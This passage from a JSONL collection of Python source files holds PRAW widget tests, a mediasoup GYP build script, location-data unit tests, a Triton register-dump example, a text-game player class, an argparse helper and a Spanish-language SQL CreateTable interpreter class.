self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n assert isinstance(widgets.items, dict)\n\n def test_progressive_images(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n\n def has_progressive(widgets_):\n # best way I could figure if an image is progressive\n sign = 'fm=pjpg'\n\n for widget in widgets_.sidebar:\n if isinstance(widget, ImageWidget):\n for image in widget:\n if sign in image.url:\n return True\n elif isinstance(widget, CustomWidget):\n for image_data in widget.imageData:\n if sign in image_data.url:\n return True\n\n return False\n\n with self.recorder.use_cassette(\n 'TestSubredditWidgets.test_progressive_images'):\n widgets.progressive_images = True\n assert has_progressive(widgets)\n widgets.progressive_images = False\n widgets.refresh()\n assert not has_progressive(widgets)\n widgets.progressive_images = True\n widgets.refresh()\n assert has_progressive(widgets)\n\n def test_refresh(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.test_refresh'):\n assert widgets.sidebar # to fetch\n old_sidebar = widgets.sidebar # reference, not value\n widgets.refresh()\n assert old_sidebar is not widgets.sidebar # should be new list\n\n def test_repr(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n assert (\"SubredditWidgets(subreddit=Subreddit(display_name='\"\n \"{}'))\").format(pytest.placeholders.test_subreddit) == repr(\n widgets)\n\n def test_sidebar(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n assert len(widgets.sidebar) >= 1 # also tests lazy-loading\n\n # all items should be Widget subclasses\n assert all(isinstance(widget, Widget) and type(widget) != Widget\n for widget in widgets.sidebar)\n\n def test_specials(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n assert isinstance(widgets.id_card, IDCard)\n assert isinstance(widgets.moderators_widget, ModeratorsWidget)\n\n def test_topbar(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n assert 1 <= len(widgets.topbar)\n assert all(isinstance(widget, Widget) and type(widget) != Widget\n for widget in widgets.topbar)\n\n\nclass TestSubredditWidgetsModeration(IntegrationTest):\n @staticmethod\n def image_path(name):\n test_dir = abspath(dirname(sys.modules[__name__].__file__))\n return join(test_dir, '..', '..', 'files', name)\n\n @mock.patch('time.sleep', return_value=None)\n def test_reorder(self, _):\n self.reddit.read_only = False\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n\n with self.recorder.use_cassette(\n 'TestSubredditWidgetsModeration.test_reorder'):\n old_order = list(widgets.sidebar)\n new_order = list(reversed(old_order))\n\n widgets.mod.reorder(new_order)\n widgets.refresh()\n assert list(widgets.sidebar) == new_order\n\n widgets.mod.reorder(old_order)\n widgets.refresh()\n assert list(widgets.sidebar) == old_order\n\n mixed_types = [thing if i % 2 == 0 else thing.id\n for i, thing in enumerate(new_order)]\n # mixed_types has some str and some Widget.\n assert any(isinstance(thing, basestring) for thing in mixed_types)\n assert any(isinstance(thing, Widget) for thing in mixed_types)\n\n widgets.mod.reorder(mixed_types)\n widgets.refresh()\n assert list(widgets.sidebar) == new_order\n\n @mock.patch('time.sleep', return_value=None)\n def test_upload_image(self, _):\n self.reddit.read_only = False\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n\n with self.recorder.use_cassette(\n 'TestSubredditWidgetsModeration.test_upload_image'):\n for image in ('test.jpg', 'test.png'):\n image_url = widgets.mod.upload_image(self.image_path(image))\n assert image_url\n\n\nclass TestTextArea(IntegrationTest):\n @mock.patch('time.sleep', return_value=None)\n def test_create_and_update_and_delete(self, _):\n self.reddit.read_only = False\n\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n\n with self.recorder.use_cassette(\n 'TestTextArea.test_create_and_update_and_delete'):\n styles = {'headerColor': '#123456', 'backgroundColor': '#bb0e00'}\n widget = widgets.mod.add_text_area(short_name='My new widget!',\n text='Hello world!',\n styles=styles)\n\n assert isinstance(widget, TextArea)\n assert widget.shortName == 'My new widget!'\n assert widget.styles == styles\n assert widget.text == 'Hello world!'\n\n widget = widget.mod.update(shortName='My old widget :(',\n text='Feed me')\n\n assert isinstance(widget, TextArea)\n assert widget.shortName == 'My old widget :('\n assert widget.styles == styles\n assert widget.text == 'Feed me'\n\n widget.mod.delete()\n\n def test_text_area(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n text = None\n for widget in widgets.sidebar:\n if isinstance(widget, TextArea):\n text = widget\n break\n assert isinstance(text, TextArea)\n assert text == text\n assert text.id == text\n assert text in widgets.sidebar\n assert text in widgets.sidebar\n\n assert text.shortName\n assert text.text\n\n assert subreddit == text.subreddit\n\n\nclass TestWidget(IntegrationTest):\n def test_inequality(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n assert len(widgets.sidebar) >= 2\n assert widgets.sidebar[0] != widgets.sidebar[1]\n assert widgets.sidebar[0] != widgets.sidebar[1].id\n assert u'\\xf0\\x9f\\x98\\x80' != widgets.sidebar[0] # for python 2\n"} {"ext": "py", "sha": "1a300032205a6b71ba08b5e7d24efeaa39f773c6", "content": "#!/usr/bin/env python\n\n#\n# Script inspired in bud:\n# https://github.com/indutny/bud\n#\n\nimport platform\nimport os\nimport subprocess\nimport sys\n\nCC = os.environ.get('CC', 'cc')\nscript_dir = os.path.dirname(__file__)\nroot = os.path.normpath(os.path.join(script_dir, '..'))\noutput_dir = os.path.join(os.path.abspath(root), 'out')\n\nsys.path.insert(0, os.path.join(root, 'deps', 'gyp', 'pylib'))\ntry:\n import gyp\nexcept ImportError:\n print('Error: you need to install gyp in deps/gyp first, run:')\n print(' ./scripts/get-dep.sh gyp')\n sys.exit(42)\n\ndef host_arch():\n machine = platform.machine()\n if machine == 'i386': return 'ia32'\n if machine == 'x86_64': return 'x64'\n if machine == 'aarch64': return 'arm64'\n if machine == 'mips64': return 'mips64el'\n if machine.startswith('arm'): return 'arm'\n if machine.startswith('mips'): return 'mips'\n return machine # Return as-is and hope for the best.\n\ndef compiler_version():\n proc = subprocess.Popen(CC.split() + ['--version'], stdout=subprocess.PIPE)\n is_clang = b'clang' in proc.communicate()[0].split(b'\\n')[0]\n proc = subprocess.Popen(CC.split() + ['-dumpversion'], stdout=subprocess.PIPE)\n version = proc.communicate()[0].split(b'.')\n mayor_version = int(version[:1][0])\n if is_clang is False and mayor_version >= 7:\n proc = subprocess.Popen(CC.split() + ['-dumpfullversion'], stdout=subprocess.PIPE)\n version = proc.communicate()[0].split(b'.')\n version = map(int, version[:2])\n version = tuple(version)\n return (version, is_clang)\n\ndef run_gyp(args):\n rc = gyp.main(args)\n if rc != 0:\n print('Error running GYP')\n sys.exit(rc)\n\nif __name__ == '__main__':\n args = sys.argv[1:]\n\n # GYP bug.\n # On msvs it will crash if it gets an absolute path.\n # On Mac/make it will crash if it doesn't get an absolute path.\n # NOTE ibc: Not sure that it requires absolute path in Mac/make...\n if sys.platform == 'win32':\n args.append(os.path.join(root, 'mediasoup-worker.gyp'))\n common_fn = os.path.join(root, 'common.gypi')\n # we force vs 2010 over 2008 which would otherwise be the default for gyp.\n if not os.environ.get('GYP_MSVS_VERSION'):\n os.environ['GYP_MSVS_VERSION'] = '2010'\n else:\n args.append(os.path.join(os.path.abspath(root), 'mediasoup-worker.gyp'))\n common_fn = os.path.join(os.path.abspath(root), 'common.gypi')\n\n if os.path.exists(common_fn):\n args.extend(['-I', common_fn])\n\n args.append('--depth=' + root)\n\n # There's a bug with windows which doesn't allow this feature.\n if sys.platform != 'win32':\n if '-f' not in args:\n args.extend('-f make'.split())\n if 'ninja' not in args:\n args.extend(['-Goutput_dir=' + output_dir])\n args.extend(['--generator-output', output_dir])\n (major, minor), is_clang = compiler_version()\n args.append('-Dgcc_version=%d' % (10 * major + minor))\n args.append('-Dclang=%d' % int(is_clang))\n if is_clang is False and major == 4 and minor <= 8:\n raise RuntimeError('gcc <= 4.8 not supported, please upgrade your gcc')\n\n if not any(a.startswith('-Dhost_arch=') for a in args):\n args.append('-Dhost_arch=%s' % host_arch())\n\n if not any(a.startswith('-Dtarget_arch=') for a in args):\n args.append('-Dtarget_arch=%s' % host_arch())\n\n if any(a.startswith('-Dopenssl_fips=') for a in args):\n fips_fn = os.path.join(os.path.abspath(root), 'fips.gypi')\n args.extend(['-I', fips_fn])\n else:\n args.append('-Dopenssl_fips=')\n\n if 'asan' in args:\n args.append('-Dmediasoup_asan=true')\n args = filter(lambda arg: arg != 'asan', args)\n else:\n args.append('-Dmediasoup_asan=false')\n\n args.append('-Dnode_byteorder=' + sys.byteorder)\n\n gyp_args = list(args)\n print(gyp_args)\n run_gyp(gyp_args)\n"} {"ext": "py", "sha": "1a3000de496c901bc6d511dd1d5046206e8ac2fa", "content": "'''\nCreated on 2020-08-11\n\n@author: wf\n'''\nimport unittest\nimport time\nfrom lodstorage.sparql import SPARQL\nfrom lodstorage.lod import LOD\nfrom ptp.location import CountryManager, ProvinceManager, CityManager\nimport datetime\nfrom collections import Counter\nimport getpass\n\nclass TestLocations(unittest.TestCase):\n '''\n check countries, provinces/states and cities\n '''\n def setUp(self):\n self.debug=False\n pass\n\n\n def tearDown(self):\n pass\n\n def testCityStorage(self):\n '''\n try storing city data in cache\n '''\n cim=CityManager(name=\"github\")\n cim.fromLutangar()\n cim.store(cim.cityList)\n\n\n def testCities(self):\n '''\n test consolidating cities from different sources\n '''\n cim=CityManager('lutangarVersusOpenResearch')\n startTime=time.time()\n cim.fromLutangar()\n self.assertEqual(128769,(len(cim.cityList)))\n print (\"reading %d cities from github took %5.1f secs\" % (len(cim.cityList),time.time()-startTime))\n startTime=time.time()\n orCities=cim.fromOpenResearch(showProgress=True)\n cityCounter=Counter(orCities)\n uniqueCities=list(cityCounter.most_common())\n print (\"reading %d cities from %d events from openresearch took %5.1f secs\" % (len(uniqueCities),len(orCities),time.time()-startTime))\n print (cityCounter.most_common(1000))\n orCityList=[]\n for cityName,count in uniqueCities:\n orCityList.append({'name': cityName, 'count': count})\n startTime=time.time()\n validCities=LOD.intersect(cim.cityList, orCityList, 'name')\n print (\"validating %d cities from openresearch took %5.1f secs\" % (len(validCities),time.time()-startTime))\n\n def getDBPedia(self,mode='query',debug=False):\n endpoint=\"http://dbpedia.org/sparql\"\n dbpedia=SPARQL(endpoint,mode=mode,debug=debug)\n return dbpedia\n\n def testDBPediaCities(self):\n '''\n https://github.com/LITMUS-Benchmark-Suite/dbpedia-graph-convertor/blob/master/get_data.py\n '''\n # kglf\n return\n dbpedia=self.getDBPedia()\n limit=100\n # Query to get the population of cities\n citiesWithPopulationQuery = \"\"\"\n PREFIX dbo: \n PREFIX dbp: \n PREFIX dbr: \n SELECT DISTINCT ?dbCity ?country ?name ?website ?population\n WHERE {\n ?dbCity a dbo:City .\n ?dbCity dbp:name ?name .\n ?dbCity dbo:country ?country .\n OPTIONAL { ?dbCity dbo:populationTotal ?population . }\n OPTIONAL { ?dbCity dbp:website ?website . }\n }\n LIMIT %d\n \"\"\" % limit\n cityList=dbpedia.queryAsListOfDicts(citiesWithPopulationQuery)\n cim=CityManager(\"dbpedia\")\n LOD.setNone4List(cityList, [\"population\",\"website\"])\n cim.store(cityList)\n\n def testDBPediaCountries(self):\n '''\n http://dbpedia.org/ontology/Country\n '''\n # kglf \n return\n dbpedia=self.getDBPedia()\n countriesQuery=\"\"\"\n # https://opendata.stackexchange.com/a/7660/18245 - dbp:iso3166code not set ...\n PREFIX dbo: \nSELECT ?country_name ?population ?isocode\nWHERE {\n ?country_name a dbo:Country .\n ?country_name dbp:iso3166code ?isocode.\n OPTIONAL { ?country_name dbo:populationTotal ?population . }\n}\n \"\"\"\n countriesResult=dbpedia.query(countriesQuery)\n print(countriesResult)\n print(len(countriesResult))\n\n def getEndPoint(self):\n endpoint=\"https://query.wikidata.org/sparql\"\n # check we have local wikidata copy:\n if getpass.getuser()==\"travis\":\n endpoint=None\n elif getpass.getuser()==\"wf\":\n # use 2018 wikidata copy\n #endpoint=\"http://blazegraph.bitplan.com/sparql\"\n # use 2020 wikidata copy\n endpoint=\"http://jena.zeus.bitplan.com/wikidata\"\n return endpoint\n\n def testWikiDataCities(self):\n '''\n test getting cities(human settlements to be precise)\n from Wikidata\n '''\n #endpoint=self.getEndPoint()\n # force caching - 3.5 hour query if done via endpoint!\n endpoint=None\n cm=CityManager(\"wikidata\")\n cm.endpoint=endpoint\n cm.fromCache()\n print(\"found %d cities\" % len(cm.cityList))\n self.assertTrue(len(cm.cityList)>=200000)\n\n def testWikiDataProvinces(self):\n '''\n test getting provinces from wikidata\n '''\n pm=ProvinceManager(\"wikidata\")\n pm.endpoint=self.getEndPoint()\n pm.fromCache()\n print(\"found %d provinces\" % len(pm.provinceList))\n self.assertTrue(len(pm.provinceList)>=195)\n\n def testWikiDataCountries(self):\n '''\n check local wikidata\n '''\n cm=CountryManager(\"wikidata\")\n cm.endpoint=self.getEndPoint()\n cm.fromCache()\n self.assertTrue(len(cm.countryList)>=195)\n\n # sparql=TestJena.getJena(debug=self.debug)\n # errors=cm.storeToRDF(sparql)\n # self.assertFalse(sparql.printErrors(errors))\n # doimport=True\n # if doimport:\n # cm2=CountryManager()\n # cm2.fromRDF(sparql)\n # self.assertEqual(cm.countryList,cm2.countryList)\n\n def testCountryManager(self):\n '''\n test storying countries in SQL format\n '''\n cm=CountryManager(\"github\",debug=True)\n cm.fromErdem()\n cm.store(cm.countryList)\n\n \n def testIntersection(self):\n '''\n test creating the intersection of a list of dictionaries\n '''\n list1 = [{'count': 351, 'evt_datetime': datetime.datetime(2015, 10, 23, 8, 45), 'att_value': 'red'},\n {'count': 332, 'evt_datetime': datetime.datetime(2015, 10, 23, 8, 45), 'att_value': 'red'},\n {'count': 336, 'evt_datetime': datetime.datetime(2015, 10, 23, 8, 45), 'att_value': 'red'},\n {'count': 359, 'evt_datetime': datetime.datetime(2015, 10, 23, 8, 45), 'att_value': 'red'},\n {'count': 309, 'evt_datetime': datetime.datetime(2015, 10, 23, 8, 45), 'att_value': 'red'}]\n\n list2 = [{'count': 359, 'evt_datetime': datetime.datetime(2015, 10, 23, 8, 45), 'att_value': 'red'},\n {'count': 351, 'evt_datetime': datetime.datetime(2015, 10, 23, 8, 45), 'att_value': 'red'},\n {'count': 381, 'evt_datetime': datetime.datetime(2015, 10, 22, 8, 45), 'att_value': 'red'}]\n\n listi=LOD.intersect(list1, list2,'count')\n print(listi)\n self.assertEquals(2,len(listi))\n listi=LOD.intersect(list1, list2)\n print(listi)\n self.assertEquals(2,len(listi))\n\n\nif __name__ == \"__main__\":\n #import sys;sys.argv = ['', 'Test.testName']\n unittest.main()\n"} {"ext": "py", "sha": "1a3000fe29d6bffbc1632b67fc91192b9e58c865", "content": "\nfrom triton import *\nfrom pintool import *\n\n# Output\n#\n# $ ./triton ./src/examples/pin/callback_signals.py ./src/samples/others/signals\n# Signal 11 received on thread 0.\n# ========================== DUMP ==========================\n# rax: 0x00000000000000 ((_ zero_extend 32) (_ bv234 32))\n# rbx: 0x00000000000000 UNSET\n# rcx: 0x00000000001ba4 ((_ zero_extend 32) ((_ extract 31 0) #81))\n# rdx: 0x0000000000000b ((_ sign_extend 32) ((_ extract 31 0) #34))\n# rdi: 0x00000000001ba4 ((_ sign_extend 32) ((_ extract 31 0) #83))\n# rsi: 0x00000000001ba4 ((_ sign_extend 32) ((_ extract 31 0) #90))\n# rbp: 0x007fff097e3540 ((_ extract 63 0) #0)\n# rsp: 0x007fff097e3528 (bvsub ((_ extract 63 0) #47) (_ bv8 64))\n# rip: 0x007f3fa0735ea7 (_ bv139911251582629 64)\n# r8: 0x007f3fa0a94c80 UNSET\n# r9: 0x007f3fb671b120 UNSET\n# r10: 0x00000000000000 UNSET\n# r11: 0x007f3fa0735e70 UNSET\n# r12: 0x00000000400460 UNSET\n# r13: 0x007fff097e3620 UNSET\n# r14: 0x00000000000000 UNSET\n# r15: 0x00000000000000 UNSET\n# xmm0: 0x000000ff000000 UNSET\n# xmm1: 0x2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f2f UNSET\n# xmm2: 0x00000000000000 UNSET\n# xmm3: 0x00ff000000ff00 UNSET\n# xmm4: 0x000000000000ff UNSET\n# xmm5: 0x00000000000000 UNSET\n# xmm6: 0x00000000000000 UNSET\n# xmm7: 0x00000000000000 UNSET\n# xmm8: 0x00000000000000 UNSET\n# xmm9: 0x00000000000000 UNSET\n# xmm10: 0x00000000000000 UNSET\n# xmm11: 0x00000000000000 UNSET\n# xmm12: 0x00000000000000 UNSET\n# xmm13: 0x00000000000000 UNSET\n# xmm14: 0x00000000000000 UNSET\n# xmm15: 0x00000000000000 UNSET\n# af: 0x00000000000000 (ite (= (_ bv16 64) (bvand (_ bv16 64) (bvxor #12 (bvxor ((_ extract 63 0) #0) (_ bv16 64))))) (_ bv1 1) (_ bv0 1))\n# cf: 0x00000000000000 (_ bv0 1)\n# df: 0x00000000000000 UNSET\n# if: 0x00000000000001 UNSET\n# of: 0x00000000000000 (_ bv0 1)\n# pd: 0x00000000000001 (ite (= (parity_flag ((_ extract 7 0) #73)) (_ bv0 1)) (_ bv1 1) (_ bv0 1))\n# sf: 0x00000000000000 (ite (= ((_ extract 31 31) #73) (_ bv1 1)) (_ bv1 1) (_ bv0 1))\n# tf: 0x00000000000000 UNSET\n# zf: 0x00000000000001 (ite (= #73 (_ bv0 32)) (_ bv1 1) (_ bv0 1))\n\n\n\ndef signals(threadId, sig):\n print 'Signal %d received on thread %d.' %(sig, threadId)\n print '========================== DUMP =========================='\n regs = getParentRegisters()\n for reg in regs:\n value = getCurrentRegisterValue(reg)\n exprId = getSymbolicRegisterId(reg)\n print '%s:\\t%#016x\\t%s' %(reg.getName(), value, (getSymbolicExpressionFromId(exprId).getAst() if exprId != SYMEXPR.UNSET else 'UNSET'))\n return\n\n\nif __name__ == '__main__':\n\n # Set architecture\n setArchitecture(ARCH.X86_64)\n\n # Start the symbolic analysis from the Entry point\n startAnalysisFromEntry()\n\n # Add a callback.\n insertCall(signals, INSERT_POINT.SIGNALS)\n\n # Run the instrumentation - Never returns\n runProgram()\n\n"} {"ext": "py", "sha": "1a300115d079adedd687bd2d5d6b2ab5068a5a87", "content": "from core.room import Room\n\n\nclass Player():\n def __init__(self, current_room, inventory = []):\n # self.name = name\n self.current_room = current_room\n self.inventory = inventory\n\n def room_info(self):\n name = self.current_room.name\n description = self.current_room.description\n return f'{name} - {description}'\n\n def investigate(self):\n item = self.current_room.items\n if item != None:\n return f'You see a {item}.'\n else:\n return \"There is nothing here.\"\n\n def remove_inventory(self):\n self.inventory = []\n"} {"ext": "py", "sha": "1a3002db951a683a9292c176146e1549f7244536", "content": "from argparse import ArgumentParser\nfrom ._version import __version__\n\ndef build_args_parser(\n prog: str,\n description: str = '',\n epilog: str = ''\n) -> ArgumentParser:\n\n parser = ArgumentParser(\n prog = prog,\n description = description,\n epilog = epilog\n )\n\n # Build Parser\n parser = add_arguments(parser)\n\n return parser\n\ndef add_arguments(parser: ArgumentParser) -> ArgumentParser:\n parser.add_argument(\n 'input',\n type=str,\n help='Path to an .xml SBOL file containing constructs designs and sequences'\n )\n parser.add_argument(\n 'output',\n type=str,\n help='Path to the output spreadsheet'\n )\n parser.add_argument(\n 'assembly_method',\n type=str,\n choices=[\"gibson\", \"golden_gate\", \"any_method\"],\n help='If \"any_method\" is selected, each construct can be built with any method. However, Golden Gate Assembly will have priority over Gibson Assembly'\n )\n parser.add_argument(\n '--nb_constructs',\n type=int,\n help='Maximum number of constructs to build (only used in tests)'\n )\n parser.add_argument(\n '--version',\n action='version',\n version='%(prog)s {}'.format(__version__),\n help='show the version number and exit'\n )\n return parser\n"} {"ext": "py", "sha": "1a30040ef7766bef0b11b045ff268440af4cf397", "content": "from Instrucciones.Declaracion import Declaracion\nfrom Instrucciones.Sql_create.Tipo_Constraint import Tipo_Constraint, Tipo_Dato_Constraint\nfrom Instrucciones.TablaSimbolos.Tipo import Tipo\nfrom Instrucciones.TablaSimbolos.Instruccion import Instruccion\nfrom Instrucciones.TablaSimbolos.Tabla import Tabla\nfrom Instrucciones.Excepcion import Excepcion\nfrom storageManager.jsonMode import *\nfrom Instrucciones.Tablas.Tablas import Tablas\nfrom Instrucciones.TablaSimbolos.Tipo import Tipo, Tipo_Dato\nfrom Instrucciones.TablaSimbolos.Tipo import Tipo, Tipo_Dato\nfrom Instrucciones.Tablas.Campo import Campo\nfrom Optimizador.C3D import *\nfrom Instrucciones.TablaSimbolos import Instruccion3D as c3d\n\nclass CreateTable(Instruccion):\n def __init__(self, tabla, tipo, campos, herencia, strGram ,linea, columna):\n Instruccion.__init__(self,tipo,linea,columna, strGram)\n self.tabla = tabla\n self.campos = campos\n self.herencia = herencia\n \n\n def ejecutar(self, tabla, arbol):\n super().ejecutar(tabla,arbol)\n # Ambito para la tabla\n tablaLocal = Tabla(tabla)\n compuesta = True\n #SE VALIDA QUE SE HAYA SELECCIONADO UN BD\n if arbol.bdUsar != None:\n for camp in self.campos:\n if isinstance(camp, Tipo_Constraint):\n tc=self.campos.pop(int(self.campos.index(camp)))\n if tc.tipo == Tipo_Dato_Constraint.UNIQUE or tc.tipo == Tipo_Dato_Constraint.PRIMARY_KEY or tc.tipo == Tipo_Dato_Constraint.FOREIGN_KEY:\n for id in tc.expresion:\n bid=False\n for ct in self.campos:\n if ct.nombre== id:\n if self.campos[self.campos.index(ct)].constraint == None:\n self.campos[self.campos.index(ct)].constraint=[]\n if tc.tipo == Tipo_Dato_Constraint.UNIQUE:\n self.campos[self.campos.index(ct)].constraint.append(Tipo_Constraint(self.tabla+\"_\"+ct.nombre+\"_pkey\", Tipo_Dato_Constraint.UNIQUE, None))\n if tc.tipo == Tipo_Dato_Constraint.PRIMARY_KEY:\n compuesta = False\n self.campos[self.campos.index(ct)].constraint.append(Tipo_Constraint(self.tabla+\"_pkey\", Tipo_Dato_Constraint.PRIMARY_KEY, None))\n #if tc.tipo == Tipo_Dato_Constraint.FOREIGN_KEY:\n #self.campos[self.campos.index(ct)].constraint.append(Tipo_Constraint(None, Tipo_Dato_Constraint.UNIQUE, None))\n bid=True\n\n if not bid:\n error = Excepcion(\"42P10\",\"Semantico\",f\"La columna <<{id}>> no existe, Error en el Constraint\",self.linea,self.columna)\n arbol.excepciones.append(error)\n arbol.consola.append(error.toString())\n return\n \n \n \n #SE VALIDA SI LA TABLA VA HEREDAR\n if self.herencia!=None:\n #SE BUSCA LA SI LA TABLA HEREDADA EXISTE\n htabla = arbol.devolverBaseDeDatos().getTabla(self.herencia)\n if htabla != None:\n tabla_temp=[]\n #SE RECORRE TODOS LAS COLUMNAS DE LA TABLA PARA UNIR CAMPOS REPETIDOS\n for campo_her in htabla.lista_de_campos:\n indice=0 \n bandera_campo=True\n for campo_nuevo in self.campos:\n if campo_her.nombre==campo_nuevo.nombre:\n tabla_temp.append(campo_nuevo)\n arbol.consola.append(f\"NOTICE: mezclando la columna <<{campo_nuevo.nombre}>> con la definición heredada.\")\n self.campos.pop(indice)\n indice+=1\n bandera_campo=False\n break\n if bandera_campo:\n tabla_temp.append(campo_her)\n tabla_temp = tabla_temp + self.campos\n self.campos= tabla_temp\n else:\n error = Excepcion(f\"42P01\",\"Semantico\",\"No existe la relación <<{self.herencia}>>.\",self.linea,self.columna)\n arbol.excepciones.append(error)\n arbol.consola.append(error.toString())\n return\n # VERIFICACIÓN LLAVES PRIMARIAS\n listaPrimarias = []\n for camp in self.campos:\n if isinstance(camp.tipo,Tipo):\n if camp.constraint != None:\n for s in camp.constraint:\n if s.tipo == Tipo_Dato_Constraint.PRIMARY_KEY:\n listaPrimarias.append(camp)\n if len(listaPrimarias) > 1 and compuesta:\n error = Excepcion(\"42P16\",\"Semantico\",\"No se permiten múltiples llaves primarias para la tabla «\"+self.tabla+\"»\",self.linea,self.columna)\n arbol.excepciones.append(error)\n arbol.consola.append(error.toString())\n return error\n \n #SE CREA UN AMBITO PARA LA TABLA\n tablaNueva = Tablas(self.tabla,None)\n #SE LLENA LA TABLA EN MEMORIA\n for camp in self.campos:\n if isinstance(camp.tipo,Tipo):\n if camp.tipo.tipo == Tipo_Dato.TIPOENUM:\n existe = arbol.getEnum(camp.tipo.nombre)\n if existe == None:\n error = Excepcion('42P00',\"Semántico\",\"El tipo \"+camp.tipo.nombre+\" no existe\",self.linea,self.columna)\n arbol.excepciones.append(error)\n arbol.consola.append(error.toString())\n return error\n if camp.constraint != None:\n for s in camp.constraint:\n if s.tipo == Tipo_Dato_Constraint.CHECK:\n arbol.comprobacionCreate = True\n objeto = Declaracion(camp.nombre, camp.tipo, s.expresion)\n checkBueno = objeto.ejecutar(tablaLocal, arbol)\n if not isinstance(checkBueno,Excepcion):\n if s.id == None:\n s.id = self.tabla+\"_\"+camp.nombre+\"_\"+\"check1\"\n #tablaNueva.agregarColumna(camp.nombre,camp.tipo.toString(),None, camp.constraint)\n #continue\n pass\n else:\n #arbol.consola.append(checkBueno.toString())\n return\n elif s.tipo == Tipo_Dato_Constraint.PRIMARY_KEY:\n if s.id == None:\n s.id = self.tabla+\"_pkey\"\n elif s.tipo == Tipo_Dato_Constraint.UNIQUE:\n if s.id == None:\n s.id = self.tabla+\"_\"+camp.nombre+\"_pkey\"\n tablaNueva.agregarColumna(camp.nombre,camp.tipo,None, camp.constraint)\n #tablaNueva.lista_constraint.append(camp.constraint)\n else:\n tablaNueva.agregarColumna(camp.nombre,camp.tipo,None, camp.constraint) \n #tablaNueva.lista_constraint.append(camp.constraint)\n arbol.comprobacionCreate = False\n #SE CREA LA TABLA EN DISCO\n ctable = createTable(arbol.bdUsar,self.tabla,len(self.campos))\n\n if ctable==0: #CUANDO LA TABLA SE CREA CORRECTAMENTE\n arbol.consola.append(f\"La Tabla: <<{self.tabla}>> se creo correctamente.\")\n arbol.agregarTablaABd(tablaNueva) \n elif ctable==3: #CUANDO LA TABLA YA EXISTE\n error = Excepcion(\"100\",\"Semantico\",\"La Tabla ya Existe.\",self.linea,self.columna)\n arbol.excepciones.append(error)\n arbol.consola.append(error.toString())\n elif ctable==2: #CUANDO POR ALGUN ERROR NO SE CREA LA TABLA.\n error = Excepcion(\"100\",\"Semantico\",\"Error Interno.\",self.linea,self.columna)\n arbol.excepciones.append(error)\n arbol.consola.append(error.toString())\n \n # SE AGREGAN LAS LLAVES PRIMARIAS A LA TABLA\n listaIndices = []\n resultado=0\n for i in listaPrimarias:\n listaIndices.append(tablaNueva.devolverColumna(i.nombre))\n if len(listaIndices) >0:\n #print(\"SE AGREGO UN INDICE\")\n resultado = alterAddPK(arbol.getBaseDatos(), self.tabla, listaIndices)\n if resultado == 1:\n error = Excepcion('XX000',\"Semántico\",\"Error interno\",self.linea,self.columna)\n arbol.excepciones.append(error)\n arbol.consola.append(error.toString())\n return error\n elif resultado == 2:\n error = Excepcion('42P00',\"Semántico\",\"La base de datos \"+str(arbol.getBaseDatos())+\" no existe\",self.linea,self.columna)\n arbol.excepciones.append(error)\n arbol.consola.append(error.toString())\n return error\n elif resultado == 3:\n error = Excepcion('42P01',\"Semántico\",\"No existe la relación \"+self.tabla,self.linea,self.columna)\n arbol.excepciones.append(error)\n arbol.consola.append(error.toString())\n return error\n elif resultado == 4:\n error = Excepcion('42P16',\"Semántico\",\"No se permiten múltiples llaves primarias para la tabla «\"+self.tabla+\"»\",self.linea,self.columna)\n arbol.excepciones.append(error)\n arbol.consola.append(error.toString())\n return error\n elif resultado == 5:\n error = Excepcion('XX002',\"Semántico\",\"Columna fuera de limites.\"+self.tabla,self.linea,self.columna)\n arbol.excepciones.append(error)\n arbol.consola.append(error.toString())\n return error\n else:\n error = Excepcion(\"100\",\"Semantico\",\"No ha seleccionado ninguna Base de Datos.\",self.linea,self.columna)\n arbol.excepciones.append(error)\n arbol.consola.append(error.toString())\n\n def generar3D(self, tabla, arbol):\n super().generar3D(tabla,arbol)\n code = []\n t0 = c3d.getTemporal()\n code.append(c3d.asignacionString(t0, \"CREATE TABLE \" + self.tabla + \" (\\\\n\"))\n \n sizeCol = len(self.campos)\n contador = 1\n for col in self.campos:\n if isinstance(col, Campo):\n sizeCol -= 1\n elif not isinstance(col, Campo):\n lista = col.generar3D(tabla, arbol)\n code += lista\n tLast = c3d.getLastTemporal()\n if contador != sizeCol:\n t3 = c3d.getTemporal()\n code.append(c3d.operacion(t3, Identificador(tLast), Valor('\",\\\\n\"', \"STRING\"), OP_ARITMETICO.SUMA))\n contador += 1\n tLast = t3\n t2 = c3d.getTemporal()\n code.append(c3d.operacion(t2, Identificador(t0), Identificador(tLast), OP_ARITMETICO.SUMA))\n t0 = t2\n\n t1 = c3d.getTemporal()\n if self.herencia != None:\n code.append(c3d.operacion(t1, Identificador(t0), Valor('\"\\\\n) INHERITS (' + self.herencia + '\"', \"STRING\"), OP_ARITMETICO.SUMA))\n t0 = t1\n t1 = c3d.getTemporal()\n code.append(c3d.operacion(t1, Identificador(t0), Valor('\");\"', \"STRING\"), OP_ARITMETICO.SUMA))\n code.append(c3d.asignacionTemporalStack(t1))\n 